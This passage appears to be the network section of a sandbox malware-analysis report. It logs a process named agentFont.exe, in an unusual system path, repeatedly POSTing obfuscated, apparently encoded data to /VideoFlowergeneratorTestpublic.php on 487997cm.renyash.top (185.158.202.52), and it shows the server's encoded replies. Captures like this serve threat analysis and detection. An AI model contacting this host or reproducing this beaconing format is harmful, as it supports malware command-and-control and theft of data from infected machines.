                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:15.471493959 CET | 1040 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:15.775003910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:15.905894995 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  72 | 192.168.2.4 | 49921 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:16.057774067 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  73 | 192.168.2.4 | 49926 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:16.227993965 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:16.580862045 CET | 1340 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:16.867933989 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:16.998817921 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  74 | 192.168.2.4 | 49927 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:16.365537882 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:16.721601009 CET | 1040 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:17.001286983 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:17.130110979 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  75 | 192.168.2.4 | 49933 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:17.259016991 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:17.612258911 CET | 1044 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:17.896120071 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:18.026186943 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:14 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  76 | 192.168.2.4 | 49939 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:18.167355061 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:18.518404007 CET | 1044 | OUT | Data Raw: 51 52 5d 53 54 4b 55 51 59 5f 5b 52 5a 5d 59 55 55 53 54 59 51 58 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QR]STKUQY_[RZ]YUUSTYQX[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<2& [ $=E-$?=%?"X52$,2>,!>+&X"#\.
                                                                                  Jan 1, 2025 11:28:18.857934952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:19.028489113 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  77 | 192.168.2.4 | 49946 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:19.166033030 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:19.518395901 CET | 1044 | OUT | Data Raw: 51 52 5d 5b 51 46 55 5f 59 5f 5b 52 5a 58 59 55 55 50 54 58 51 5a 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QR][QFU_Y_[RZXYUUPTXQZ[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(2"47%..31%$?:X"%$V)'?\5=%?:&X"#\.
                                                                                  Jan 1, 2025 11:28:19.803261995 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:19.934016943 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  78 | 192.168.2.4 | 49956 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:20.068250895 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:20.424664974 CET | 1044 | OUT | Data Raw: 51 57 58 5f 51 44 50 59 59 5f 5b 52 5a 52 59 56 55 53 54 5e 51 5c 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QWX_QDPYY_[RZRYVUST^Q\[_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+-W7=4%),-%)3<>#%)%/2>4(!-+:&X"#\.
                                                                                  Jan 1, 2025 11:28:20.732130051 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:20.869177103 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  79 | 192.168.2.4 | 49962 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:21.010674000 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:21.362304926 CET | 1044 | OUT | Data Raw: 51 50 5d 5a 54 4b 55 50 59 5f 5b 52 5a 5f 59 53 55 5e 54 51 51 5f 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]ZTKUPY_[RZ_YSU^TQQ_[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.<1=#>#&[5:[3R&3<&"%?>>'_6-1_+&X"#\.<
                                                                                  Jan 1, 2025 11:28:21.675456047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:21.811707020 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  80 | 192.168.2.4 | 49968 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:21.942708015 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  81 | 192.168.2.4 | 49970 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:22.011842966 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:22.362166882 CET | 1340 | OUT | Data Raw: 54 50 5d 5d 51 46 50 5b 59 5f 5b 52 5a 5b 59 50 55 53 54 5e 51 50 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]]QFP[Y_[RZ[YPUST^QP[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?1>7#%5.#U%?1$,65-3Y>*$;\51X(&X"#\.,
                                                                                  Jan 1, 2025 11:28:22.656697989 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:22.787827969 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 10 3e 18 30 02 25 28 32 09 24 3d 38 0d 28 0d 21 00 2d 3c 25 5a 25 2a 0a 58 2b 55 33 52 3d 3b 04 15 3f 03 34 11 31 0b 3f 0d 24 35 2a 51 00 1c 23 59 2b 38 24 06 3f 01 36 1d 29 1f 3c 05 3c 2f 34 02 22 14 2b 56 27 38 2a 56 27 03 27 5d 3c 3f 30 57 3b 25 06 02 3b 30 2c 01 24 26 2f 52 09 14 21 11 29 55 3b 56 26 54 22 5b 33 30 09 5b 21 3b 3b 56 37 0b 2a 09 23 1d 0d 5d 28 5b 27 58 36 0f 22 11 31 2c 03 1d 3c 03 38 08 21 14 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: '>0%(2$=8(!-<%Z%*X+U3R=;?41?$5*Q#Y+8$?6)<</4"+V'8*V'']<?0W;%;0,$&/R!)U;V&T"[30[!;;V7*#](['X6"1,<8!#T,#V6]Q


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  82 | 192.168.2.4 | 49971 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:22.130012035 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:22.487135887 CET | 1044 | OUT | Data Raw: 54 55 58 59 54 42 55 5e 59 5f 5b 52 5a 5c 59 5c 55 52 54 59 51 5b 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TUXYTBU^Y_[RZ\Y\URTYQ[[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^)19".(]%5:>31<.$<="0?);5*?&X"#\.0
                                                                                  Jan 1, 2025 11:28:22.787524939 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:22.922365904 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  83 | 192.168.2.4 | 49980 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:23.074376106 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:23.424779892 CET | 1044 | OUT | Data Raw: 51 50 5d 59 54 46 55 5d 59 5f 5b 52 5a 5c 59 5c 55 50 54 58 51 5a 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]YTFU]Y_[RZ\Y\UPTXQZ[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(":4>?$.5-12_3"$/+$_"!X(*&X"#\.0
                                                                                  Jan 1, 2025 11:28:23.709578037 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:23.837861061 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  84 | 192.168.2.4 | 49987 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:23.998079062 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:24.346529961 CET | 1044 | OUT | Data Raw: 54 5b 5d 5b 54 40 50 5b 59 5f 5b 52 5a 5f 59 5d 55 51 54 5b 51 5e 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[][T@P[Y_[RZ_Y]UQT[Q^[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(=W#'&>E.=W&/X$&X"'2=3_6.!<:&X"#\.<
                                                                                  Jan 1, 2025 11:28:24.634610891 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:24.761995077 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:21 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  85 | 192.168.2.4 | 49993 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:24.894813061 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:25.252813101 CET | 1044 | OUT | Data Raw: 54 5a 5d 58 54 47 55 51 59 5f 5b 52 5a 5b 59 5d 55 52 54 5d 51 59 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZ]XTGUQY_[RZ[Y]URT]QY[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\)!)U4Y&>>E.=T2>Y')#%)3)P)4!=&)*&X"#\.,
                                                                                  Jan 1, 2025 11:28:25.548115015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:25.678998947 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  86 | 192.168.2.4 | 49999 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:25.809298038 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:26.159049988 CET | 1044 | OUT | Data Raw: 54 52 58 5e 51 44 55 5a 59 5f 5b 52 5a 58 59 56 55 56 54 5a 51 59 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TRX^QDUZY_[RZXYVUVTZQY[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._(%T4><$.=-R$,>_3>X520?1S)'_5[9^):&X"#\.
                                                                                  Jan 1, 2025 11:28:26.466671944 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:26.599980116 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:23 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  87 | 192.168.2.4 | 50006 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:26.743664980 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
